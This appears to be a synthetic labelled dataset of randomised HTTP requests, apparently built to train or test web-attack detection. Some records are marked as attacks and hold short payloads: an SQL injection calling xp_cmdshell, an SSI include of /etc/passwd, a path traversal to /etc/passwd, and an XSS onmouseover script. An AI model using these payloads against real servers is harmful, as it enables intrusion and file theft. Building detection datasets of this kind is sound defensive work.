Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: 0sVtatep-iups;q=0.6, nr5i-scniy;q=0.2, fnMEs5m-hi4et, shye-iH6o
Cookie: DM8_W7gKstdinVN=28950537;htli5ypeWesget=n NAewksl\6jjfss ct;EeaJ=';EXEC    master.dbo.xp_cmdshell 'cmd.exe;99=48953227;dLf1d=oAe]lintsEnNincer
Date: Sun, 09 Jan 05 22:42:26 GMT
If-Unmodified-Since: Mon, 25 May 09 19:25:42 CET
Authorization: Basic eTlpc2FuYnM6azZwYWgwaUU=
Referer: /id0xl7/tdAeenc/hiamee6/cwH9tdeo.tiff
User-Agent: Mozilla/6.6 (Machintosh; U; Mac OS X 5.3; qs-iy; rv:5.5.1) Gecko/13602152
UA-Disp: 0171,5038,8
Transfer-Encoding: compress
----: ------------------------------------

null

End - Id: 35027
Start - Id: 22099
class: Valid
GET /irKvCfF3RfpNge6/owe30oEneanotennp/ouon/cmdAKBmWq7lO7kstdin2/p6tvh3/Hr3gy07/h8p8st926/g@ebHeZ.s3/eXcEgEnPB.exe?VTdicDJ=echoRmailhtaccesh&rhx=linputnop&etnSdam=sQt1mkcB-f&he=19&w.h.-gwlX=56734074&eaeasnbie5eimyr=42965&rhxn8nasaeavteo=6323&7I=rEsg7gen0y HTTP/1.0
Host: www.9str.be:80
Connection: keep-alive
Accept: text/*;q=0.0, text/plain, text/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=497
Client-ip: 26.31.74.193
Cookie: vClnodeL= tetFi;._IU=);T3W1V=a0nihd4;miesiaus3rce=rj9h3QRqc
Cookie2: $Version="3"
Date: Tue, 05 Sep 06 11:35:27 GMT
ETag: W/"lYWZyNUWq8@aWk_jMrW"
Expect: o5oh
From: eidhdeG@fpho.st
If-Modified-Since: Mon, 29 Aug 05 08:07:11 GMT
If-Unmodified-Since: Thu, 13 Nov 08 07:00:56 CET
If-Match: *
If-None-Match: *
If-Range: "BHXBdJN0A49z@-W@sOqt"
Max-Forwards: 9
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM bmFzaHNlYXppYWhvVGlqZW9UYW5ud3NvbkVtZ3VhaXN0b2c2eW90dG5l
Authorization: Basic aWRpTG9hdjpUM3JE
Range: 96-,140-326001,-7
Referer: http://0saeo.gov/seeblsts/ijpeteE/jtth/s8ott.tar.gz
TE: trailers,deflate;q=0.0
Trailer: Proxy-Authorization
User-Agent: hcfga/0.3.3.4
UA-CPU: StrongARM
UA-Disp: 1342,370,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8724x0388
Via: FTP/3.5 191.11.233.201, 3.5 145.58.204.159, FTP/0.5 30.194.150.14:32964
Transfer-Encoding: deflate
Upgrade: sdqs/1.2, otap/2.3, suO/8.6, t03/1.8
Warning: 503 www.atcO.png "aniinsIheewgiof" 
X-Forwarded-For: 223.155.250.69
X-Serial-Number: 42920569636252963929
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22099
Start - Id: 3781
class: Valid
GET /ddZ1d4yfsx84PyqK/o0lr-7LX_Tinq@/culki0s3ismuht/n9rLUAl8/7otl86QPk_f19P-E/esYdzF0yR/bS.jpeg? HTTP/1.1
Host: www.lttNotdrut.net
Connection: keep-alive
Accept: application/*, application/*;q=0.4, application/rtf
Accept-Charset: windows-1250;q=0.7, iso-8859-2, iso-8859-8, iso-8859-8
Accept-Encoding: deflate;q=0.7, compress, deflate;q=0.5, deflate, gzip
Accept-Language: Acddeert-di, d8oNd-puo3ST9;q=0.1, dHnadeh-rvEkt
Cache-Control: no-cache
Client-ip: 235.59.125.79
Cookie: 4iaig2iotdol=fX@;_icmdMsb=hrp oc:2h;boit8ihrA9t4t9n=2;uIczU2zbodytb=070168969;passwdov4sam=ruXyt
Cookie2: $Version="367"
Date: Sat, 21 May 05 21:29:34 CET
ETag: W/"Cw5CBzPYBcAwz@Gj"
Expect: 100-continue
From: ueatims@oatosfu.net
If-Modified-Since: Sun, 18 Apr 04 16:56:53 UTC
If-Unmodified-Since: Sat, 10 Nov 07 23:28:52 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 17 Dec 04 14:34:29 UTC
Max-Forwards: 9143
MIME-Version: 2.1
Pragma: Taeeen=ar
Proxy-Authorization: Basic Y3NuY2Rlb2o6b3lzNW0=
Authorization: Digest qop=vel7f
Range: -60328,-3384,331-
Referer: /ayboo0/egaec/AspeRj.dll
TE: chunked;q=0.2,trailers,deflate;q=0.4
Trailer: Transfer-Encoding
User-Agent: eNSmUwb http://www.taepEff.uk
UA-CPU: PowerPC
UA-Disp: 599,9039,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0475x7705
Via: 2.8 www.ahoesoI.png
Transfer-Encoding: identity
Upgrade: ae6/0.7, dwb/4.2, ltsri/6.3, aNt/0.1, 4t3eGn/0.0
Warning: 034 234.86.11.26 "CauegTgiutt0" 
X-Forwarded-For: 76.164.228.145
X-Serial-Number: 68867877
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3781
Start - Id: 1665
class: Valid
GET /icEJirwwreebtdwtj/rWM8HnhWG_BU5T7KyE7/tOwT@c@H7p/0ZTMWg@1QAG/Rel5tkcredy7vOetOew/e1ftsneasrnJoEstt2mc/tr.php?em6lfNone=sp9tgtaid&hdeusathsoct=nbodyceaidncatgdi&nVi9ete6lu2eoo=92984&aIhea=438491270&MI3RzWdocumentmailx=r%5D&haial=lsM&wHniiSauDrhPEbi=nip3y7isyI&vm=63907386&usrandsystem7execDE1boot.iniWh=rUEWxlgUW&aocoanD2fEw=and%3B5cmd&nevx6rlrrebm=1reaf8pI%29&F3=xs1tago2edtoeos41a&07KnWtmpq.1r-W=91158 HTTP/1.1
Host: 33.233.249.116
Connection: nNtAed7
Accept: */*;q=0.4
Accept-Charset: x-mac-cyrillic, cp-936;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=9594
Client-ip: 167.69.61.157
Cookie: ut0u= ct<7nxas;iEtoaoteFt=fyudksaee;uiozwa=71546109;cirewi=sn?Jsso;Agh9s=yrro;obyetusanatnd=sZWExVxu8b
Cookie2: $Version="23"
Date: Thu, 29 Jan 09 02:50:23 CET
ETag: W/"gn5L@kHETqToPwgC"
Expect: nrlqttn=dtiaa2e
From: irssarta@oehXEem.gov
If-Modified-Since: Wed, 20 Dec 06 17:37:14 CET
If-Unmodified-Since: Mon, 18 Jun 07 16:29:40 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Jun 06 24:46:19 UTC
Max-Forwards: 155
MIME-Version: 9.8
Pragma: c9htdteh='h3gb'
Proxy-Authorization: sesl mseen0c=dlpAam
Authorization: tU2rHm p1u8=toreoE
Range: 73-
Referer: http://www.ay3h.com/laap3na/nirNht.cfm
TE: gzip,trailers
Trailer: Via
User-Agent: Mozilla/1.1 (compatible; MSIE 1.6; Solaris; 6clnso; hvtelu; aenuct)
UA-CPU: 68000
UA-Disp: 6991,2124,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3594x3874
Via: FTP/9.5 www.ayeloa.tiff, din6Tb/2.9 www.ilotosle.png
Transfer-Encoding: identity
Upgrade: edsh/1.1, 0e3eaA/2.7, 9eisMe/2.7
Warning: 713 www.liacs.shtml "tenh1oogsntt7wsMck" 
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 65212341307
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1665
Start - Id: 39835
class: SSI
GET /zMiNMjWeaV1IzEPG/UIG1F8Wusrc2/52UT0SJ/icdhslne.html?seerPtao=%3C%21--%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22++--%3E&pd78Kap@=2877542&3tgvxp_binL7ZLsb=eev HTTP/1.0
Host: 102.206.46.71
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: aredu-i, slcwiAs-a;q=0.3
Cache-Control: no-transform
Client-ip: 92.223.213.84
Cookie: lrutzdyrua0msui=pnetwirae7eiiyO;ipvtouuO=Csebi7tatsopenEbOa=;7A
Cookie2: $Version="00"
Date: Wed, 29 Apr 09 08:52:29 GMT
ETag: W/".HClj.3fmFZ94@YR4"
Expect: 100-continue
From: Hhfthamp@seaduno.org
If-Modified-Since: Fri, 04 Mar 05 23:53:42 CET
If-Unmodified-Since: Thu, 06 Apr 06 08:11:28 UTC
If-Match: *
If-None-Match: "AOtD-Uiw2eZQ-obccV"
If-Range: *
Max-Forwards: 483
MIME-Version: 8.3
Pragma: no-cache
Authorization: Basic aHZ2aFJ3b3E6Z3Rzcw==
Referer: http://eOehu.fr/ldi2bq.png
TE: trailers,deflate;q=0.8
Trailer: Trailer
User-Agent: Mozilla/5.1 (Windows; U; Win98 8.3; on-g6; rv:7.9.5) Gecko/21190536
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3110x4951
Via: rsa/5.4 37.85.122.20, 9.5 www.7yenqve.js:84, 5.1 21.145.138.234
Transfer-Encoding: deflate
Upgrade: rwgy5l/4.0, iih/8.8, itn/2.2
X-Forwarded-For: 158.183.166.134
X-Serial-Number: 713018476258
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39835
Start - Id: 8900
class: Valid
GET /ffshdebp3z/oRZtXp6/Bg7UXdeletestdinrcpbgsoundsM%u/iata.html? HTTP/1.1
Host: 139.115.98.75
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.0, gzip;q=0.6, identity;q=0.0, compress
Accept-Language: *
Cache-Control: max-stale
Client-ip: 30.198.149.185
Cookie: 3ia=8rnof;oh8yT3nN7mn=1l2wnm;netOjoo=gdl=
Cookie2: $Version="266"
Date: Sun, 02 Jan 05 02:57:41 GMT
ETag: "o_YERB0dpVOt2YXC"
Expect: 100-continue
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Thu, 22 Sep 05 09:39:03 GMT
If-Unmodified-Since: Wed, 09 Jun 04 23:42:47 CET
If-Match: "mYnDiLwmFnwEgQQsf4k0"
If-None-Match: "y9P4-4RdNPiKXaomFq"
If-Range: *
Max-Forwards: 298
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic aXlla3RsOmdlZW1y
Authorization: ron6ej 1ttvyTbt=E5rdAd
Range: 326-7
Referer: http://EwNein.de/mdroilhs/ikgy2/kawf/cilio.asmx
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/3.5 (Machintosh; U; Mac OS X 4.9; ee-py; rv:6.0.5) Gecko/69494350
UA-CPU: Sparc
UA-Disp: 012,690,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 000x5970
Via: sn2/7.7 www.spsdaep.jpeg
Transfer-Encoding: acat; pse8esi=ripsrk
Upgrade: ne7b/6.5
Warning: 504 www.w3oroz9y.htm "acttofeQ52Va9c" 
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 266699
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 8900
Start - Id: 5307
class: Valid
PUT /o8kuZxkc/ohdTilQ/kqEouXoonoarahy/yDXTKrB9O/iK3d/eSFnruWEvB7hGEJr/tK/jigebaoth7i/0nas8.jpg? HTTP/1.0
Content-Length: 253
Content-Language: kMner,e
Content-Encoding: deflate
Content-Location: /exn4enlx/hehr5e.asp
Content-MD5: MmM3YWhlNXRaY3Rlb290NA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Apr 05 22:12:13 GMT
Last-Modified: Sun, 03 Feb 08 08:49:16 UTC
Host: 145.156.225.110:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 32.242.144.60
Cookie: lCrRD5ECN3tohUu=sRajV;UK35x=e;am= t8261lfyscriptuus;bmGZ1XY=8;uf6window.openQN6ftp=nD1_59yU
Cookie2: $Version="7"
Date: Thu, 06 Aug 09 07:03:20 CET
ETag: "ZACoUb91i3g1qQt"
Expect: enfl
From: naRoHav2@prVrEyldam.com
If-Modified-Since: Wed, 12 Oct 05 06:22:14 CET
If-Unmodified-Since: Fri, 30 Apr 04 08:04:08 GMT
If-Match: *
If-None-Match: *
If-Range: "sxtr9kh_d2_VmYFC"
Max-Forwards: 9725
MIME-Version: 6.3
Pragma: m=o
Proxy-Authorization: Aaaf lnogj4h=etlars
Authorization: Digest opaque="sekbt"
Range: 8822-34,539805-
Referer: /lafo/hvymzshs/mTTa2/Italn.mspx
TE: gzip;q=0.2
Trailer: If-None-Match
User-Agent: notecNecbnetl78t5srt
UA-CPU: 68000
UA-Disp: 370,737,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4339x4945
Via: 3.3 www.s3nnqsg.js:512, 9.0 www.thpltx.shtml, 3.0 www.diAo.css
Transfer-Encoding: deflate
Upgrade: ecp/2.5, rdiiad/1.4, eindq/0.0
Warning: 218 43.28.61.59 "ovEe0ysqedar" "Wed, 21 Apr 10 15:43:26 GMT"
X-Forwarded-For: 194.87.49.44
X-Serial-Number: 6090087986849
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

H1=eih&KWr.89=QrleqseHx&poul=b&6d4nitcdr=38679&p4sSvJt=ku&Cnoioi=%gdie tcso0fI&z4=aT7i-S.HZC&l3faG2elzb5t4=o1anteeiitreromekr&ltyr9eassc=2236&rhgatthrtka=mwtse3tmdocumenty0niperlw&dnicfna= orOuEat<&eeed8Dnsrosg=E5nlrufKahelfero&e7erleTl6n=1524844601

End - Id: 5307
Start - Id: 11776
class: Valid
GET /iuytaa80k4vswwneun9.aspx?Uoadrtfhrtwhsm=05&tfL=2u&trdRn=7 HTTP/1.1
Host: 226.52.107.242
Connection: close
Accept: image/jpeg;q=0.1, video/quicktime, text/xml;q=0.5
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.4, deflate
Accept-Language: *;q=0.0
Cache-Control: min-fresh=15
Client-ip: 51.103.184.132
Cookie: tai5smusomR=;\exterm
Cookie2: $Version="7"
Date: Mon, 12 Mar 07 21:02:55 CET
ETag: "_Xa@6Bpb60Qnyc8k"
Expect: 100-continue
From: KeaS@rpHi9.it
If-Modified-Since: Sun, 21 Jan 07 06:27:40 UTC
If-Unmodified-Since: Sat, 04 Nov 06 15:49:22 CET
If-Match: *
If-None-Match: "vO98C7o1DvoqfApdV"
If-Range: Fri, 09 May 08 10:45:51 CET
Max-Forwards: 3
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM ZGRMazhodGRqb2Fka2FBcnJzMGFyYW5yc2hIbjVkZXR1aXB2Y3ZlcXQ=
Authorization: Digest qop=auth-int
Range: 9-947069
Referer: /ddEi1cs/siehju/toe1iae/p2jprate/l4oo.mdb
TE: deflate;q=0.0
Trailer: From
User-Agent: oreHntE (r1scL-hB; eYgl7cDGa; oBQ1vBsA; eCVBKdpQP3; l69mrjfBlM)
UA-CPU: x86
UA-Disp: 580,584,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 883x0271
Via: FTP/7.9 235.116.38.237:52, 3tts/8.9 www.seie4w.tiff
Transfer-Encoding: deflate
Upgrade: CeaT/1.3, qaai/6.4, iJd4/5.3
Warning: 864 www.odc5ns.htm "tlwt73eSeidle" "Sat, 17 Jan 04 09:21:50 GMT"
X-Forwarded-For: 92.235.100.67
X-Serial-Number: 74383585408029434744
----: -----------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 11776
Start - Id: 8744
class: Valid
GET /Neeh/sb0cnEeS@lSv/iealtsseatchhetceis/Aoa/3IlLoefdo6icnt6w1/o7lxuQPML8/HUyc73group byr6b7-/ebpjGqGLNi8bBwM0b/uol/yxW9@tsciN.jpeg?i1rtl8sw4e=satfa+hpt&euwNaiehlot=m94ZDn-G4d&afo0=tJq&8t23ianme9f6re=ooetBtHarq8bwpdocumenti&tchesoisrf8x=noirioqtuGtLmlat&ngcMo=k%3D HTTP/1.1
Host: www.otam1.it
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr, windows-1250;q=0.5, cp-950
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 11.138.13.94
Cookie: qfgoptzifjs=Meihsaepoo;noEdrztevlcne=ar@s
Cookie2: $Version="37"
Date: Thu, 07 Dec 06 12:00:16 CET
ETag: W/"a@RBy6YzAxXFbiS"
Expect: 100-continue
From: gtRthpn@euhjO9.it
If-Modified-Since: Sat, 11 Aug 07 13:56:51 UTC
If-Unmodified-Since: Mon, 31 Oct 05 05:28:08 CET
If-Match: *
If-None-Match: "-BZn5PRIOIAUn37xB"
If-Range: Mon, 13 Jul 09 02:23:36 GMT
Max-Forwards: 69
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: twi2ig maenlana=he6iSwdI
Authorization: Digest nc=E82Bd8a6
Range: 291-,7962-175
Referer: /ebti7/kalsd/EyetetO7/ISgeo.dll
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/0.8 (compatible; MSIE 5.2; Open BSD i386; fsao; uyUetea4tj)
UA-CPU: PowerPC
UA-Disp: 036,8992,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 323x9926
Via: HTTP/3.8 38.233.186.80, 3.5 www.tmehi3rt.png:1102, 6.0 182.93.239.66
Transfer-Encoding: deflate
Upgrade: nr2n/6.6, c8dm/9.0, eih/0.8, mee/9.2
Warning: 642 69.235.0.195:2770 "RaqtwI1" "Tue, 27 Jul 04 11:32:37 GMT"
X-Forwarded-For: 85.79.219.185
X-Serial-Number: 14852095010495286519
----: ---------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8744
Start - Id: 34917
class: Valid
POST /eraherr/eBagthoir6wtEbRno/9ECYHM1ROjA/UqRCnph-DnohYf/b7/rE/R5W/andn1T/yDk1IINNH/g_Ts4/n6F5yYSe1V6yQrG0.tiff? HTTP/1.0
Content-Length: 44
Content-Language: 4dciilat
Content-Encoding: compress
Content-Location: /ehHeN3.doc
Content-MD5: SXNlbzJuZ2Nzb2VqdUFpZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 14 Aug 06 05:45:04 CET
Last-Modified: Tue, 14 Apr 09 13:16:42 CET
Host: 29.15.200.109:48
Connection: close
Accept: application/x-tar;q=0.6, video/mpeg;q=0.7, audio/*;q=0.2
Accept-Charset: euc-jp, big5;q=0.5
Accept-Encoding: 
Accept-Language: juiYk1-embno, i-cq;q=0.9, iDr-9uNahnI;q=0.0, tdeitqtw-grn, Seh-vedU
Cache-Control: max-age=267
Client-ip: 229.74.234.254
Cookie: ty=005515
Cookie2: $Version="9"
Date: Tue, 29 Dec 09 08:46:43 UTC
ETag: W/"2ZGVZ7-h9APwrNSm"
Expect: uociasa
From: cmiB@dzchl57eeb.fr
If-Modified-Since: Mon, 23 Jun 08 14:12:32 UTC
If-Unmodified-Since: Sun, 10 Jul 05 05:17:25 GMT
If-Match: "QEm7-e-zFHZu873Lz"
If-None-Match: "03aFeLVlHMB11sE1KS"
If-Range: Sun, 01 Jan 06 10:33:16 CET
Max-Forwards: 446
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest nc=72e2B70C
Authorization: Basic YXc2bzpOb2ZxMw==
Range: 620-856266,09-5,0-
Referer: http://www.oErtetne.de/fey5c/Eill.php
TE: chunked;q=0.5,deflate,trailers
Trailer: Expect
User-Agent: Mozilla/4.7 (X11; U; Linux i386 4.7; tt-ho; rv:6.1.5) Gecko/66849149
UA-CPU: x86
UA-Disp: 7242,197,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2377x8201
Via: 3.8 www.afel4htt.js
Transfer-Encoding: gzip
Upgrade: Rdo/4.6, As7e/2.7, wanot/9.0, d3it/2.0
Warning: 142 223.248.82.42 "ljqtgix0lgu1sa" 
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 61683738419
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Nsj14fYt4ndaZda=rsexecr  irgymkajtn@telnet

End - Id: 34917
Start - Id: 46308
class: PathTransversal
GET /izxwv7ECfTN/alz3ngpyumwdtvdn/rqi4eB5a2as7n6n8reia/EfsRiy0tnedufinhtn/n2neeSsDotztnno/tKhGQAlcexi22/gswetrrjk/aggtgBeS/t1/rQB-ce/ceoin1etn.png?dEiuttenHpb=+%3DiE&autkhclgce=aidbsamichildlc&vnarqoheq4Std=x&r05mtgsnh=434141&drchat=%2Fetc%2Fpasswd&zrad=71232036&nametojsgia=h%7Eaf%25ct1bEel&eignbSltUSaemt=5894875051&te8eoi5e=51&slCtTodeana=9222114&asmsgae=tk3ZFLA&oAaescol=q5jIql3 HTTP/1.1
Host: www.dehnhIdar.it:4259
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=52
Client-ip: 208.222.203.198
Cookie: cHabimesisi=7;Cton7e=hpositionopeendwp-d;rtcEwtaantsFeu=h1hu5D;eusan4ee2qoebg=t;He0wleize=27;fSa_=sLj9Pgvvl
Cookie2: $Version="180"
Date: Sat, 23 Dec 06 21:53:06 GMT
ETag: W/"X6BJrt.UWHlAh@dky"
Expect: 100-continue
From: twei@aedq.de
If-Modified-Since: Thu, 12 Aug 04 19:35:31 GMT
If-Unmodified-Since: Mon, 02 Apr 07 22:38:59 UTC
If-Match: "d7hVVzv@k-gaOxdW73NK"
If-None-Match: *
If-Range: Mon, 11 May 09 16:02:32 CET
Max-Forwards: 014
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM SWV0eWl5NXJoSXNUbG9pZXpveW5kclRvb2xiYXlmY2NhYXQ=
Authorization: thxnbk kedS=0knxosl0
Range: 4090-
Referer: /r8set.msf
TE: deflate,trailers,chunked
Trailer: Expect
User-Agent: ortdn3/9.0.2.5.6
UA-CPU: Sparc
UA-Disp: 609,9430,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 434x579
Via: 2.1 www.f5rarsr.tiff, ieteb/3.4 21.177.175.188
Transfer-Encoding: identity
Upgrade: iNrqo/0.0, 3ii6c/7.6, pN6ieo/9.3, uda/6.3
Warning: 733 13.150.194.194 "tn9trrrTditsmhmen" "Mon, 28 Nov 05 14:46:45 CET"
X-Forwarded-For: 207.118.108.52
X-Serial-Number: 4859376671430624
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46308
Start - Id: 27017
class: Valid
GET /inehi0utnhcadJaeih/e8waksA2/5WLC2Y7cxyIWvHPWu/iIcach7sLoIdTrse.gif?W8k3mocha5=tst&ihn1ithcteoazps=5219&oAdO0gor6t=oa&nradih=eidTreeoyfhxarm&_XL8s=autoexec6%3F&T6znj04hro=ni08processing-instruction%3Fashttposybetweenei&ilhRiiREHap=oriHhrrs&8ttxesaebaio=9nyFJP-A5Y&mT5NMJTK=8 HTTP/1.1
Host: 159.126.88.64
Connection: dtebaN
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: t5qAy-H2;q=0.9
Cache-Control: nr='yoaoE'
Client-ip: 202.222.48.227
Cookie: ntiolc0rtogsGit=zm0J
Cookie2: $Version="7"
Date: Fri, 22 Oct 04 07:15:02 CET
ETag: W/"gNLdQ.apZ1RIwfNrF"
Expect: tncr=iroe;uoonohpD
From: erxoee@uwm9y1m1lh.net
If-Modified-Since: Tue, 27 May 08 11:18:25 CET
If-Unmodified-Since: Sat, 03 Feb 07 04:54:33 GMT
If-Match: *
If-None-Match: "vcOUe@R3h.4UV5RwcDB."
If-Range: Sun, 21 Jan 07 02:46:56 UTC
Max-Forwards: 2
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Basic b3RuaWFSYTpodG5vdGk=
Authorization: Basic blVtaWY2ZTplaDFzbA==
Range: -2,41933-,520-237717
Referer: http://ty4jsdrl.it/Frtk/eddseabw.mp3
TE: trailers
Trailer: Date
User-Agent: sdrh (m46i.vEg; sxqe7LP; rgEBA7_gC7)
UA-CPU: StrongARM
UA-Disp: 9952,4769,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6860x985
Via: FTP/8.9 www.6eSo.htm, 3.9 173.98.145.110:10, FTP/3.2 www.TrhrRd.js
Transfer-Encoding: deflate
Upgrade: niuoa/4.9, niEhnt/1.9, inr8/1.3, leu/2.5
Warning: 866 www.tvytE8.tiff "nAg6tTeeSfegQmnsr" "Fri, 23 Jan 09 21:23:14 GMT"
X-Forwarded-For: 41.72.7.124
X-Serial-Number: 95252684073786404
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27017
Start - Id: 14478
class: Valid
GET /vspenok/ySv7m/oS/oWK/1Rynoo/ieveehnsEtEhmoal/d579zhheU/ealmpedti5sleelep/lCHEaj/OWITTCge29zsxzhaving.cgi?lOne4btuye9lor=6&4e=hoji&0er=eeNcaoho2I4iN0D&HF2-cat=8510837&Ltrgm=lnses%3C&sees=59&sbias=mgaaieosraO9ho HTTP/1.1
Host: www.0ayja.biz
Connection: keep-alive
Accept: video/*, image/*, video/*
Accept-Charset: windows-1252;q=0.4
Accept-Encoding: compress, deflate
Accept-Language: *;q=0.2
Cache-Control: max-stale=457
Client-ip: 170.230.16.124
Cookie: erbwfaovJb=ivhsDesdRTawiubseo;Ausn=8886;eebIuwe=6554787205;alediutim=so;jrtgbcutlotNyt=aqG
Cookie2: $Version="858"
Date: Sat, 21 Jul 07 01:58:03 UTC
ETag: "R5nigEc_B4ON9dtm68s8"
Expect: y9si=crLcm0u8;tdhtKic
From: utt4e4@eaLhafx.uk
If-Modified-Since: Sat, 21 Jul 07 09:58:32 UTC
If-Unmodified-Since: Fri, 20 Feb 04 13:26:48 CET
If-Match: *
If-None-Match: "K4.UOuTCQWC.@Jn"
If-Range: *
Max-Forwards: 00
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Basic b0x1ZmF3OmVvcmFhdEFO
Authorization: haTrEt 6itupsrO=rqrrn0
Range: 737195-
Referer: http://ieaOe.net/ziNsch/Sa8s9ad/es1Ea6w/prea1/c9ick.cfm
TE: deflate;q=0.2,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.5 (compatible; MSIE 6.4; Open BSD i386; a9is2n; gutf7tlee)
UA-CPU: 68000
UA-Disp: 927,088,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 505x6087
Via: 9.1 247.160.52.137, 4.0 www.Gnnp.jpg:2581
Transfer-Encoding: compress
Upgrade: aha/1.7, himts/1.6, uNp/7.6, Grw/1.1, Etd/1.9
Warning: 757 www.nIo0ah6.js "tqayt3cezel3A7N" "Thu, 01 Dec 05 06:57:15 GMT"
X-Forwarded-For: 57.244.86.38
X-Serial-Number: 309851
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 14478
Start - Id: 48046
class: XSS
GET /m-C/4aob.gif?tjthplwnsaneeu=ahb58&aHloiloy=1sinztwget4iru&tdEiseoeenorn=sHIvhAfJR&telnetfcatexec7Hhttps=ss%5D&noubl=a4l&ueEpc=dom%5Domc+positionysuo8t&bV_a=y+g&evshgfsa6dj=668&ith=39167&awaeoimikst=664554&gelelvnuhaahs=seeaDb30&ilntitw=os+6a%25i%25tthya&hwbsEe=%3Cimg++src++++%3D+%22++tiasitrons++++%22onmouseover%3D++%22++%5Balert++%28%27eVHe66ia%27%29%3B%5D%22++++%3E&eanrsieda=11685177 HTTP/1.0
Host: www.1pant.com
Connection: scearngr
Accept: image/*;q=0.8
Accept-Charset: x-mac-chinesesimp;q=0.5, x-mac-arabic
Accept-Encoding: 
Accept-Language: TtoEsEhT-4neE;q=0.0, ahns-edrtI;q=0.3, yaeh-aae38dl3, Lieuhib-hdj9nTh
Cache-Control: a='EWd'
Client-ip: 252.198.126.142
Cookie: 5D9Aodelete.=2347240;rSNlBy=likezauco;Wc8jhI=a5hp
Cookie2: $Version="8"
Date: Mon, 10 Nov 08 04:27:57 UTC
ETag: "TAbjxX0Cb5--Rw6U2ZA"
Expect: anmte=7mtotl;taCmh=mwueaUo
From: elwwua@EmhIEncw.it
If-Modified-Since: Fri, 17 Nov 06 12:40:11 CET
If-Unmodified-Since: Fri, 29 Aug 08 05:57:08 GMT
If-Match: "5Zo9n_zWHv2coNR"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: jae8sr 0tnaix=eudc
Authorization: Digest qop=auth-int
Range: -2,4927-,7358-69
Referer: http://aieipeit.ch/sqstrB8.php3
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/1.4 (Windows; U; WinNT 0.1; wt-tt; rv:7.4.8) Gecko/87144559
UA-CPU: StrongARM
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9126x119
Via: 9.0 www.t33pa.tiff, oh3i6e/3.3 68.53.176.230
Transfer-Encoding: f0ac; marvnnn=q1d7E
Upgrade: ohr/0.8, dird/9.6, ccspda/7.4, eaonS/0.7, xbT1yr/6.0
Warning: 931 43.142.35.211 "tUI3qeeCt" "Mon, 16 Feb 04 11:58:32 CET"
X-Forwarded-For: 188.45.251.30
X-Serial-Number: 405569074263988888
----: -----------------------------
~~~~~: ~~~~~~~~~~~

null

